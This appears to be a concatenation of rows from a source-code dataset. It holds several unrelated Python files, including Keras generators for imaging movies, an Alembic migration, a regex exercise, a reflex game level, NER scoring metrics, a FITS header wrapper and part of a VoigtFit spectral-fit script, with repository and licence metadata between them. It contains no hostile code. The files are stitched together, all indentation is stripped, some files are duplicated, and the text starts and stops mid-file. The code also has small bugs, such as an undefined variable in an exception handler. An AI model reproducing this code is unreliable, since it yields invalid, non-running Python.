)
output_full = np.zeros([1, self.nb_probes, 2, 1], dtype="float32")
input_index = np.arange(
index_frame - self.pre_post_frame - self.pre_post_omission,
index_frame + self.pre_post_frame + self.pre_post_omission + 1,
)
input_index = input_index[input_index != index_frame]
for index_padding in np.arange(self.pre_post_omission + 1):
input_index = input_index[input_index != index_frame - index_padding]
input_index = input_index[input_index != index_frame + index_padding]
data_img_input = self.raw_data[input_index, :, :]
data_img_output = self.raw_data[index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
data_img_input = (
data_img_input.astype("float32") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float32") - self.local_mean
) / self.local_std
# alternating filling with zeros padding
even = np.arange(0, self.nb_probes, 2)
odd = even + 1
input_full[0, even, 0, :] = data_img_input[:, 0, :]
input_full[0, odd, 1, :] = data_img_input[:, 1, :]
output_full[0, even, 0, 0] = data_img_output[:, 0]
output_full[0, odd, 1, 0] = data_img_output[:, 1]
return input_full, output_full
class SingleTifGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
self.raw_data_file = self.json_data["train_path"]
self.batch_size = self.json_data["batch_size"]
self.pre_post_frame = self.json_data["pre_post_frame"]
self.pre_post_omission = self.json_data["pre_post_omission"]
self.start_frame = self.json_data["start_frame"]
if "randomize" in self.json_data.keys():
self.randomize = self.json_data["randomize"]
else:
self.randomize = 1
# This is compatible with negative frames
self.end_frame = self.json_data["end_frame"]
with tifffile.TiffFile(self.raw_data_file) as tif:
self.raw_data = tif.asarray()
self.total_frame_per_movie = self.raw_data.shape[0]
if self.end_frame < 0:
self.img_per_movie = (
self.total_frame_per_movie + 1 + self.end_frame - self.start_frame
)
elif self.total_frame_per_movie < self.end_frame:
self.img_per_movie = self.total_frame_per_movie + 1 - self.start_frame
else:
self.img_per_movie = self.end_frame + 1 - self.start_frame
average_nb_samples = 1000
local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
local_data = local_data.astype("float32")
self.local_mean = np.mean(local_data)
self.local_std = np.std(local_data)
self.list_samples = np.arange(
self.pre_post_frame + self.pre_post_omission + self.start_frame,
self.start_frame
+ self.img_per_movie
- self.pre_post_frame
- self.pre_post_omission,
)
if self.randomize:
np.random.shuffle(self.list_samples)
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def __getitem__(self, index):
# Generate indexes of the batch
if (index + 1) * self.batch_size > self.total_frame_per_movie:
indexes = np.arange(index * self.batch_size, self.img_per_movie)
else:
indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)
shuffle_indexes = self.list_samples[indexes]
input_full = np.zeros(
[
self.batch_size,
self.raw_data.shape[1],
self.raw_data.shape[2],
self.pre_post_frame * 2,
],
dtype="float32",
)
output_full = np.zeros(
[self.batch_size, self.raw_data.shape[1], self.raw_data.shape[2], 1],
dtype="float32",
)
for batch_index, frame_index in enumerate(shuffle_indexes):
X, Y = self.__data_generation__(frame_index)
input_full[batch_index, :, :, :] = X
output_full[batch_index, :, :, :] = Y
return input_full, output_full
def __data_generation__(self, index_frame):
# X : (n_samples, *dim, n_channels)
"Generates data containing batch_size samples"
input_full = np.zeros(
[
1,
self.raw_data.shape[1],
self.raw_data.shape[2],
self.pre_post_frame * 2,
],
dtype="float32",
)
output_full = np.zeros(
[1, self.raw_data.shape[1], self.raw_data.shape[2], 1], dtype="float32"
)
input_index = np.arange(
index_frame - self.pre_post_frame - self.pre_post_omission,
index_frame + self.pre_post_frame + self.pre_post_omission + 1,
)
input_index = input_index[input_index != index_frame]
for index_padding in np.arange(self.pre_post_omission + 1):
input_index = input_index[input_index != index_frame - index_padding]
input_index = input_index[input_index != index_frame + index_padding]
data_img_input = self.raw_data[input_index, :, :]
data_img_output = self.raw_data[index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (
data_img_input.astype("float32") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float32") - self.local_mean
) / self.local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
return input_full, output_full
class OphysGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
if "from_s3" in self.json_data.keys():
self.from_s3 = self.json_data["from_s3"]
else:
self.from_s3 = False
self.raw_data_file = self.json_data["movie_path"]
self.batch_size = self.json_data["batch_size"]
self.pre_frame = self.json_data["pre_frame"]
self.post_frame = self.json_data["post_frame"]
self.start_frame = self.json_data["start_frame"]
# This is compatible with negative frames
self.end_frame = self.json_data["end_frame"]
# This is used to limit the total number of samples
# -1 means to take all and is the default fall back
if "total_samples" in self.json_data.keys():
self.total_samples = self.json_data["total_samples"]
else:
self.total_samples = -1
if self.from_s3:
s3_filesystem = s3fs.S3FileSystem()
raw_data = h5py.File(s3_filesystem.open(self.raw_data_file,'rb'),'r')['data']
else:
raw_data = h5py.File(self.raw_data_file, "r")["data"]
self.total_frame_per_movie = int(raw_data.shape[0])
if self.end_frame < 0:
self.img_per_movie = (
self.total_frame_per_movie
+ 1
+ self.end_frame
- self.start_frame
- self.post_frame
)
elif self.total_frame_per_movie < self.end_frame:
self.img_per_movie = (
self.total_frame_per_movie - self.start_frame - self.post_frame
)
else:
self.img_per_movie = self.end_frame + 1 - self.start_frame
average_nb_samples = 1000
local_data = raw_data[0:average_nb_samples, :, :].flatten()
local_data = local_data.astype("float32")
self.local_mean = np.mean(local_data)
self.local_std = np.std(local_data)
self.list_samples = np.arange(
self.start_frame, self.start_frame + self.img_per_movie
)
if "randomize" in self.json_data.keys():
self.randomize = self.json_data["randomize"]
else:
self.randomize = 1
if self.randomize:
np.random.shuffle(self.list_samples)
# We cut the number of samples if asked to
if self.total_samples>0 and self.total_samples<len(self.list_samples):
self.list_samples = self.list_samples[0:self.total_samples]
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def __getitem__(self, index):
# Generate indexes of the batch
if (index + 1) * self.batch_size > self.total_frame_per_movie:
indexes = np.arange(index * self.batch_size, self.img_per_movie)
else:
indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)
shuffle_indexes = self.list_samples[indexes]
input_full = np.zeros(
[self.batch_size, 512, 512, self.pre_frame + self.post_frame],
dtype="float32",
)
output_full = np.zeros([self.batch_size, 512, 512, 1], dtype="float32")
for batch_index, frame_index in enumerate(shuffle_indexes):
X, Y = self.__data_generation__(frame_index)
input_full[batch_index, :, :, :] = X
output_full[batch_index, :, :, :] = Y
return input_full, output_full
def __data_generation__(self, index_frame):
"Generates data containing batch_size samples"
if self.from_s3:
s3_filesystem = s3fs.S3FileSystem()
movie_obj = h5py.File(s3_filesystem.open(self.raw_data_file,'rb'),'r')
else:
movie_obj = h5py.File(self.raw_data_file, "r")
input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
output_full = np.zeros([1, 512, 512, 1])
input_index = np.arange(
index_frame - self.pre_frame, index_frame + self.post_frame + 1,
)
input_index = input_index[input_index != index_frame]
data_img_input = movie_obj["data"][input_index, :, :]
data_img_output = movie_obj["data"][index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (
data_img_input.astype("float") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float") - self.local_mean
) / self.local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
movie_obj.close()
return input_full, output_full
class MovieJSONGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
self.sample_data_path_json = self.json_data["train_path"]
self.batch_size = self.json_data["batch_size"]
self.steps_per_epoch = self.json_data["steps_per_epoch"]
self.epoch_index = 0
# The following is to be backward compatible
if "pre_frame" in self.json_data.keys():
self.pre_frame = self.json_data["pre_frame"]
else:
self.pre_frame = self.json_data["pre_post_frame"]
if "post_frame" in self.json_data.keys():
self.post_frame = self.json_data["post_frame"]
else:
self.post_frame = self.json_data["pre_post_frame"]
with open(self.sample_data_path_json, "r") as json_handle:
self.frame_data_location = json.load(json_handle)
self.lims_id = list(self.frame_data_location.keys())
self.nb_lims = len(self.lims_id)
self.img_per_movie = len(self.frame_data_location[self.lims_id[0]]["frames"])
def __len__(self):
"Denotes the total number of batches"
return int(np.ceil(float(self.nb_lims * self.img_per_movie) / self.batch_size))
def on_epoch_end(self):
self.epoch_index = self.epoch_index + 1
def __getitem__(self, index):
# This is to ensure we are going through the entire data when steps_per_epoch<self.__len__
index = index + self.steps_per_epoch * self.epoch_index
# Generate indexes of the batch
if (index + 1) * self.batch_size > self.nb_lims * self.img_per_movie:
indexes = np.arange(
index * self.batch_size, self.nb_lims * self.img_per_movie
)
else:
indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)
input_full = np.zeros(
[self.batch_size, 512, 512, self.pre_frame + self.post_frame]
)
output_full = np.zeros([self.batch_size, 512, 512, 1])
for batch_index, frame_index in enumerate(indexes):
X, Y = self.__data_generation__(frame_index)
input_full[batch_index, :, :, :] = X
output_full[batch_index, :, :, :] = Y
return input_full, output_full
def get_lims_id_sample_from_index(self, index):
local_img = int(np.floor(index / self.nb_lims))
local_lims_index = int(index - self.nb_lims * local_img)
local_lims = self.lims_id[local_lims_index]
return local_lims, local_img
def __get_norm_parameters__(self, index_frame):
local_lims, local_img = self.get_lims_id_sample_from_index(index_frame)
local_mean = self.frame_data_location[local_lims]["mean"]
local_std = self.frame_data_location[local_lims]["std"]
return local_mean, local_std
def __data_generation__(self, index_frame):
# X : (n_samples, *dim, n_channels)
"Generates data containing batch_size samples"
try:
local_lims, local_img = self.get_lims_id_sample_from_index(index_frame)
# Initialization
local_path = self.frame_data_location[local_lims]["path"]
_filenames = ["motion_corrected_video.h5", "concat_31Hz_0.h5"]
motion_path = []
for _filename in _filenames:
_filepath = os.path.join(local_path, "processed", _filename)
if os.path.exists(_filepath) and not os.path.islink(
_filepath
): # Path exists and is not symbolic
motion_path = _filepath
break
movie_obj = h5py.File(motion_path, "r")
output_frame = self.frame_data_location[local_lims]["frames"][local_img]
local_mean = self.frame_data_location[local_lims]["mean"]
local_std = self.frame_data_location[local_lims]["std"]
input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
output_full = np.zeros([1, 512, 512, 1])
input_index = np.arange(
output_frame - self.pre_frame, output_frame + self.post_frame + 1,
)
input_index = input_index[input_index != output_frame]
data_img_input = movie_obj["data"][input_index, :, :]
data_img_output = movie_obj["data"][output_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (data_img_input.astype("float") - local_mean) / local_std
data_img_output = (data_img_output.astype("float") - local_mean) / local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
movie_obj.close()
return input_full, output_full
except:
print("Issues with " + str(self.lims_id) + " at " + str(output_frame_index))
| 13,167 | 4,331 | 505 |
31d15073f4299bffb88f36168fb8ffcab78c52c8 | 1,228 | py | Python | migrations/versions/b652b688d0ed_.py | firmitfeng/SurveysFlask | d25cdd68261088cfdf9596b291f70a1b0c32fd25 | [
"MIT"
] | null | null | null | migrations/versions/b652b688d0ed_.py | firmitfeng/SurveysFlask | d25cdd68261088cfdf9596b291f70a1b0c32fd25 | [
"MIT"
] | null | null | null | migrations/versions/b652b688d0ed_.py | firmitfeng/SurveysFlask | d25cdd68261088cfdf9596b291f70a1b0c32fd25 | [
"MIT"
] | null | null | null | """empty message
Revision ID: b652b688d0ed
Revises: c6170594b21e
Create Date: 2017-06-22 12:43:46.146126
"""
# revision identifiers, used by Alembic.
revision = 'b652b688d0ed'
down_revision = 'c6170594b21e'
from alembic import op
import sqlalchemy as sa
| 30.7 | 80 | 0.673453 | """empty message
Revision ID: b652b688d0ed
Revises: c6170594b21e
Create Date: 2017-06-22 12:43:46.146126
"""
# revision identifiers, used by Alembic.
revision = 'b652b688d0ed'
down_revision = 'c6170594b21e'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('archives',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('content', sa.Text(), nullable=True),
sa.Column('keywords', sa.String(length=200), nullable=True),
sa.Column('type', sa.String(length=64), nullable=True),
sa.Column('ctime', sa.DateTime(), nullable=True),
sa.Column('author_id', sa.Integer(), nullable=True),
sa.Column('object_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),
sa.ForeignKeyConstraint(['object_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.add_column(u'messages', sa.Column('ctime', sa.DateTime(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column(u'messages', 'ctime')
op.drop_table('archives')
### end Alembic commands ###
| 922 | 0 | 46 |
29f40798e34ed8bade7a6e4e67fca54f24b3f2fb | 403 | py | Python | find_num.py | sanchagrins/Python | aad28edb8fd338a8da30f515e8239b403c6902b0 | [
"MIT"
] | null | null | null | find_num.py | sanchagrins/Python | aad28edb8fd338a8da30f515e8239b403c6902b0 | [
"MIT"
] | null | null | null | find_num.py | sanchagrins/Python | aad28edb8fd338a8da30f515e8239b403c6902b0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Purpose: Exercise for Coursera Class Using Python to Access Web Data.
# Reads through a file, extracts numbers using regex and sums them.
import re
fh = open("regex_sum_320787.txt", 'r')
numlist = list()
for line in fh:
line = line.rstrip()
x = re.findall('[0-9]+', line)
if x:
x = [int(i) for i in x]
numlist.extend(x)
print sum(numlist)
| 25.1875 | 76 | 0.632754 | #!/usr/bin/env python
# Purpose: Exercise for Coursera Class Using Python to Access Web Data.
# Reads through a file, extracts numbers using regex and sums them.
import re
fh = open("regex_sum_320787.txt", 'r')
numlist = list()
for line in fh:
line = line.rstrip()
x = re.findall('[0-9]+', line)
if x:
x = [int(i) for i in x]
numlist.extend(x)
print sum(numlist)
| 0 | 0 | 0 |
a2725f355ef2b28067c0cff16fc47dcc673d222c | 7,418 | py | Python | Level3.py | MAXIORBOY/ReflexGame | 69d3c12f2a227cd948009f863fb5c16ce1c70256 | [
"MIT"
] | null | null | null | Level3.py | MAXIORBOY/ReflexGame | 69d3c12f2a227cd948009f863fb5c16ce1c70256 | [
"MIT"
] | null | null | null | Level3.py | MAXIORBOY/ReflexGame | 69d3c12f2a227cd948009f863fb5c16ce1c70256 | [
"MIT"
] | null | null | null | import random
from Items import *
pygame.init()
| 42.878613 | 263 | 0.630089 | import random
from Items import *
pygame.init()
class TerroristsAndCivilians:
def __init__(self, window_width, window_height):
self.targets = Sprites()
self.grid = Grid(window_width, window_height, self.targets.sprite_dimension)
self.terrorist, self.civilian = self.pick_fruit()
self.current_index = 0
self.min_number_terrorists = 1
self.max_number_terrorists = 3
self.min_number_civilians = 0
self.max_number_civilians = 3
self.pre_defined_rounds = []
self.build_pre_defined_rounds()
self.min_interval = 500
self.max_interval = 1500
self.round_time = 2000
self.round_intervals = []
self.build_round_intervals()
self.rounds = {}
self.build_rounds()
self.fruit_determiner = {'apple': 'every', 'bananas': 'all', 'grapes': 'all', 'lemon': 'every', 'orange': 'every', 'peach': 'every', 'pineapple': 'every', 'plum': 'every', 'watermelon': 'every'}
def pick_fruit(self):
samples = random.sample(self.targets.available_sprites, k=2)
return samples[0], samples[1]
def build_pre_defined_rounds(self):
for i in range(self.min_number_terrorists, self.max_number_terrorists + 1):
for j in range(self.min_number_civilians, self.max_number_civilians + 1):
self.pre_defined_rounds.append((i, j))
random.shuffle(self.pre_defined_rounds)
def build_round_intervals(self):
for _ in range(len(self.pre_defined_rounds)):
self.round_intervals.append(int(random.random() * (self.max_interval - self.min_interval) + self.min_interval))
def build_rounds(self):
def split_list(list_to_split, len_first_part):
return [list_to_split[:len_first_part], list_to_split[len_first_part:]]
total_time = 0
times = []
grids = []
for i in range(len(self.round_intervals)):
total_time += self.round_intervals[i]
times.append(total_time)
grids.append([[], []])
total_time += self.round_time
times.append(total_time)
grids.append(split_list(random.sample(self.grid.grid, k=sum(self.pre_defined_rounds[i])), self.pre_defined_rounds[i][0]))
self.rounds['times'] = times
self.rounds['grids'] = grids
def get_current_sprites_placement(self, clock_time):
index = self.current_index
while self.rounds['times'][index] < clock_time:
if index + 1 < len(self.rounds['times']):
index += 1
else:
break
self.current_index = index
return self.rounds['grids'][index]
class Fruit:
def __init__(self, sprite, kind, position, dimension):
self.sprite = sprite
self.kind = kind
self.x, self.y = position
self.dimension = dimension
def is_mouse_over(self, mouse_pos):
if self.x < mouse_pos[0] < self.x + self.dimension:
if self.y < mouse_pos[1] < self.y + self.dimension:
return True
return False
class Level3:
def __init__(self, root, master_window):
self.root = root
self.master_window = master_window
self.sounds = Sounds()
self.terrorist_and_civilians = TerroristsAndCivilians(self.root.window_width, self.root.window_height)
self.description = Description(self.root, ['Click at ' + self.terrorist_and_civilians.fruit_determiner[self.terrorist_and_civilians.terrorist] + ' ' + self.terrorist_and_civilians.terrorist, 'Do not click at any ' + self.terrorist_and_civilians.civilian])
self.time_measures = TimeMeasures()
self.results = Results(self.root, 3)
self.backgrounds = Backgrounds()
self.current_sprites = []
self.current_round = -1
self.status = True
def prepare_round(self):
self.current_sprites = []
grids = self.terrorist_and_civilians.rounds['grids'][self.terrorist_and_civilians.current_index][0]
for i in range(len(grids)):
self.current_sprites.append(Fruit(self.terrorist_and_civilians.targets.sprites[self.terrorist_and_civilians.terrorist], 'terrorist', grids[i], self.terrorist_and_civilians.targets.sprite_dimension))
grids = self.terrorist_and_civilians.rounds['grids'][self.terrorist_and_civilians.current_index][1]
for i in range(len(grids)):
self.current_sprites.append(Fruit(self.terrorist_and_civilians.targets.sprites[self.terrorist_and_civilians.civilian], 'civilian', grids[i], self.terrorist_and_civilians.targets.sprite_dimension))
def draw_round(self):
self.root.window.blit(self.backgrounds.background_levels, (0, 0))
for fruit in self.current_sprites:
self.root.window.blit(fruit.sprite, (fruit.x, fruit.y))
pygame.display.update()
def calculate_misses(self):
misses = 0
for sprite in self.current_sprites:
if sprite.kind == 'terrorist':
self.time_measures.strikes += 1
misses += 1
if misses:
self.sounds.miss_sound.play()
if misses == len(self.terrorist_and_civilians.rounds['grids'][self.current_round][0]):
self.time_measures.round_times[self.current_round] = -1
def main_loop(self):
loop_status = True
start = pygame.time.get_ticks()
while pygame.time.get_ticks() - start < self.terrorist_and_civilians.rounds['times'][-1] and loop_status:
self.terrorist_and_civilians.get_current_sprites_placement(pygame.time.get_ticks() - start)
if self.current_round != self.terrorist_and_civilians.current_index:
self.calculate_misses()
self.current_round = self.terrorist_and_civilians.current_index
self.prepare_round()
self.draw_round()
for event in pygame.event.get():
mouse_pos = pygame.mouse.get_pos()
for current_sprite in self.current_sprites:
if current_sprite.is_mouse_over(mouse_pos) and event.type == pygame.MOUSEBUTTONDOWN:
self.current_sprites.remove(current_sprite)
if current_sprite.kind == 'terrorist':
stop = pygame.time.get_ticks()
self.sounds.correct_sound.play()
self.time_measures.round_times[self.current_round] = stop - start - self.terrorist_and_civilians.rounds['times'][self.current_round - 1]
else:
self.sounds.wrong_sound.play()
self.time_measures.strikes += 1
if event.type == pygame.QUIT:
self.status = False
loop_status = False
self.calculate_misses()
def run_level(self):
self.description.description_window()
if self.description.status:
self.main_loop()
if self.status:
self.time_measures.end_level_update()
self.results.result_window(self.time_measures)
if not self.results.status:
self.master_window.turn_off_master()
else:
self.master_window.turn_off_master()
else:
self.master_window.turn_off_master()
| 6,931 | -9 | 444 |
4f1567896d929471cf6007f360c8ea31880d6fe7 | 4,432 | py | Python | Chinese_NER/evaluate.py | fengyh3/Chinese_Resume_NER | 24d532d0d15d56860ef7857e3bbcca104f2eb938 | [
"MIT"
] | 11 | 2020-04-01T11:41:43.000Z | 2021-09-22T07:02:22.000Z | Chinese_NER/evaluate.py | fengyh3/Chinese_Resume_NER | 24d532d0d15d56860ef7857e3bbcca104f2eb938 | [
"MIT"
] | null | null | null | Chinese_NER/evaluate.py | fengyh3/Chinese_Resume_NER | 24d532d0d15d56860ef7857e3bbcca104f2eb938 | [
"MIT"
] | 1 | 2020-05-09T01:43:47.000Z | 2020-05-09T01:43:47.000Z | from collections import Counter
from utils import flatten_lists
| 39.571429 | 106 | 0.548962 | from collections import Counter
from utils import flatten_lists
class Metrics(object):
def __init__(self, golden_tags, predict_tags, remove_O = True):
self.golden_tags = flatten_lists(golden_tags)
self.predict_tags = flatten_lists(predict_tags)
if remove_O:
self._remove_Otags()
self.tagset = set(self.golden_tags)
self.correct_tags_number = self.count_correct_tags()
self.predict_tags_counter = Counter(self.predict_tags)
self.golden_tags_counter = Counter(self.golden_tags)
self.precision_scores = self.cal_precision()
self.recall_scores = self.cal_recall()
self.f1_scores = self.cal_f1()
def count_correct_tags(self):
correct_dict = {}
for gold_tag, predict_tag in zip(self.golden_tags, self.predict_tags):
if gold_tag == predict_tag:
if gold_tag not in correct_dict:
correct_dict[gold_tag] = 1
else:
correct_dict[gold_tag] += 1
return correct_dict
def cal_precision(self):
precision_scores = {}
for tag in self.tagset:
if self.predict_tags_counter[tag] == 0:
self.predict_tags_counter[tag] = 1
precision_scores[tag] = self.correct_tags_number.get(tag, 0) / self.predict_tags_counter[tag]
return precision_scores
def cal_recall(self):
recall_scores = {}
for tag in self.tagset:
recall_scores[tag] = self.correct_tags_number.get(tag, 0) / self.golden_tags_counter[tag]
return recall_scores
def cal_f1(self):
f1_scores = {}
for tag in self.tagset:
p, r = self.precision_scores[tag], self.recall_scores[tag]
f1_scores[tag] = 2 * p * r / (p + r + 1e-10)
return f1_scores
def report_scores(self):
"""将结果用表格的形式打印出来,像这个样子:
precision recall f1-score support
B-LOC 0.775 0.757 0.766 1084
I-LOC 0.601 0.631 0.616 325
B-MISC 0.698 0.499 0.582 339
I-MISC 0.644 0.567 0.603 557
B-ORG 0.795 0.801 0.798 1400
I-ORG 0.831 0.773 0.801 1104
B-PER 0.812 0.876 0.843 735
I-PER 0.873 0.931 0.901 634
avg/total 0.779 0.764 0.770 6178
"""
header_format = '{:>9s} {:>9} {:>9} {:>9} {:>9}'
header = ['precision', 'recall', 'f1-score', 'support']
print(header_format.format('', *header))
row_format = '{:>9s} {:>9.4f} {:>9.4f} {:>9.4f} {:>9}'
for tag in self.tagset:
print(row_format.format(
tag,
self.precision_scores[tag],
self.recall_scores[tag],
self.f1_scores[tag],
self.golden_tags_counter[tag]
))
avg_metrics = self.cal_weighted_average()
print(row_format.format(
'avg/total',
avg_metrics['precision'],
avg_metrics['recall'],
avg_metrics['f1_score'],
len(self.golden_tags)
))
def cal_weighted_average(self):
weighted_average = {}
total = len(self.golden_tags)
weighted_average['precision'] = 0.
weighted_average['recall'] = 0.
weighted_average['f1_score'] = 0.
for tag in self.tagset:
size = self.golden_tags_counter[tag]
weighted_average['precision'] += self.precision_scores[tag] * size
weighted_average['recall'] += self.recall_scores[tag] * size
weighted_average['f1_score'] += self.f1_scores[tag] * size
for metric in weighted_average.keys():
weighted_average[metric] /= total
return weighted_average
def _remove_Otags(self):
length = len(self.golden_tags)
O_tag_indices = [i for i in range(length) if self.golden_tags[i] == 'O']
self.golden_tags = [tag for i, tag in enumerate(self.golden_tags) if i not in O_tag_indices]
self.predict_tags = [tag for i, tag in enumerate(self.predict_tags) if i not in O_tag_indices] | 2,641 | 1,742 | 24 |
128e8e0bed81ee72905b7e8a2add5bee9df2df35 | 3,866 | py | Python | PyParadise/header.py | brandherd/PyParadise | 1c65bf634e17931f165fd88b9938f604b9371e2e | [
"MIT"
] | 1 | 2021-06-01T13:07:54.000Z | 2021-06-01T13:07:54.000Z | PyParadise/header.py | brandherd/PyParadise | 1c65bf634e17931f165fd88b9938f604b9371e2e | [
"MIT"
] | 3 | 2021-11-03T02:07:38.000Z | 2022-03-14T20:35:04.000Z | PyParadise/header.py | brandherd/PyParadise | 1c65bf634e17931f165fd88b9938f604b9371e2e | [
"MIT"
] | null | null | null | import astropy.io.fits as pyfits
| 33.327586 | 89 | 0.498189 | import astropy.io.fits as pyfits
class Header(object):
def __init__(self, header=None, origin=None):
"""
Creates an Header object
Parameters
--------------
header : pyfits.header object, optional
Fits header as header
origin : string, optional
Name of the Fits file as the origin for the header,
can be the full path of the file
"""
if header is not None:
# Assign private variable and convert header to card list
self._header = header
else:
# Create empty Header and CardList objects
self._header = None
# Set the Fits file origin of the header if given
if origin is not None:
self._origin = origin
else:
self._origin = None
def setHeader(self, header, origin=None):
self._header = header
self._origin = origin
def loadFitsHeader(self, filename, extension=0):
"""
Loads the header information from a Fits file
Parameters
---------------
filename : string
Filename of the Fits file from which the header should be loaded.
The full path to the file can be given.
extension : integer, optional
Extension of the Fits file from the header shall be read
"""
self._header = pyfits.getheader(filename, ext=extension)
self._origin = filename
def writeFitsHeader(self, filename=None, extension=0):
"""
Writes the header to an existing Fits file
Parameters:
---------------
filename : string, optional
Filename of the Fits file to which the header is written.
The full path to the file can be given.
If filename is none, the value of _origin ise used.
extenstion : integer, optional
Extension of the Fits file to which the header is written.
"""
if filename is None:
f_out = self._origin
else:
f_out = filename
hdu = pyfits.open(f_out, mode='update')
hdu[extension].header = self._header
hdu[extension].update_header()
hdu.flush()
def getHdrValue(self, keyword):
"""
Returns the value of a certain keyword in the header
Parameters:
---------------
keyword : string
valid keyword in the header
Returns:
---------------
out : string, integer or float
stored value in the header for the given keyword
"""
return self._header[keyword]
def getHdrKeys(self):
"""
Returns all valid keywords of the Header
Returns:
---------------
out : list
list of strings representing the keywords in the header
"""
return self._header.keys()
def getHeader(self):
return self._header
def setHdrValue(self, keyword, value, comment=None):
if self._header is None:
self._header = pyfits.Header()
if comment is None:
try:
self._header.update(keyword, value)
except ValueError:
self._header[keyword] = (value)
else:
try:
self._header.update(keyword, value, comment)
except ValueError:
self._header[keyword] = (value, comment)
| 573 | 3,236 | 23 |
504fe8b4813d6970424712a3f23a2e0df3a783b4 | 1,012 | py | Python | model/game_model_proxy.py | PetrSpacek/angrylikegame-python-pyqt5 | 2ddc73fb5b4398117c3a83593632408b4b44e246 | [
"MIT"
] | 2 | 2020-01-17T10:43:13.000Z | 2021-11-21T14:56:53.000Z | model/game_model_proxy.py | PetrSpacek/angrylikegame-python-pyqt5 | 2ddc73fb5b4398117c3a83593632408b4b44e246 | [
"MIT"
] | null | null | null | model/game_model_proxy.py | PetrSpacek/angrylikegame-python-pyqt5 | 2ddc73fb5b4398117c3a83593632408b4b44e246 | [
"MIT"
] | null | null | null | from model.command import AbsCommand
from model.game_model import AbsGameModel
from model.game_object import GameObject
| 25.3 | 52 | 0.713439 | from model.command import AbsCommand
from model.game_model import AbsGameModel
from model.game_object import GameObject
class GameModelProxy(AbsGameModel):
def __init__(self, subject: AbsGameModel):
self.subject = subject
def move_cannon_up(self):
self.subject.move_cannon_up()
def move_cannon_down(self):
self.subject.move_cannon_down()
def aim_cannon_up(self):
self.subject.aim_cannon_up()
def aim_cannon_down(self):
self.subject.aim_cannon_down()
def cannon_shoot(self):
self.subject.cannon_shoot()
def toggle_shooting_mode(self):
self.subject.toggle_shooting_mode()
def create_memento(self) -> object:
return self.subject.create_memento()
def restore_memento(self, memento):
self.subject.restore_memento(memento)
def register_command(self, command: AbsCommand):
self.subject.register_command(command)
def undo_last_command(self):
self.subject.undo_last_command()
| 557 | 14 | 319 |
d745485ddfded67faabda3bdea895d1e8ceaa236 | 4,304 | py | Python | test_data/VoigtFit_example.py | jkrogager/VoigtFit | ca84ff4b9e6827e2ca64cd03c9437ab5d4097f1a | [
"MIT"
] | 21 | 2018-03-06T02:06:03.000Z | 2022-01-18T05:24:35.000Z | test_data/VoigtFit_example.py | jkrogager/VoigtFit | ca84ff4b9e6827e2ca64cd03c9437ab5d4097f1a | [
"MIT"
] | 21 | 2018-03-03T11:53:09.000Z | 2022-03-02T20:43:34.000Z | test_data/VoigtFit_example.py | jkrogager/VoigtFit | ca84ff4b9e6827e2ca64cd03c9437ab5d4097f1a | [
"MIT"
] | 9 | 2018-05-16T03:34:19.000Z | 2021-11-30T02:38:17.000Z | import numpy as np
import VoigtFit
### Fit DLA towards quasar Q1313+1441
### Observed in X-shooter P089.A-0068
z_DLA = 1.7941
logNHI = 21.3, 0.1 # value, uncertainty
# If log(NHI) is not known use:
#logNHI = None
#### Load UVB and VIS data:
UVB_fname = 'data/test_UVB_1d.spec'
res_UVB = 8000
VIS_fname = 'data/test_VIS_1d.spec'
res_VIS = 11800
wl_uvb, spec_uvb, err_uvb = np.loadtxt(UVB_fname, unpack=True)
wl_vis, spec_vis, err_vis = np.loadtxt(VIS_fname, unpack=True)
# Alternatively, load a FITS spectrum (either a FITS table or array):
# wl, flux, err, mask, header = VoigtFit.io.load_fits_spectrum(fname)
dataset = VoigtFit.DataSet(z_DLA)
dataset.add_data(wl_uvb, spec_uvb, 299792./res_UVB, err=err_uvb, normalized=False)
dataset.add_data(wl_vis, spec_vis, 299792./res_VIS, err=err_vis, normalized=False)
### Define absorption lines:
dataset.add_line('FeII_2374')
dataset.add_line('FeII_2260')
dataset.add_line('CrII_2056')
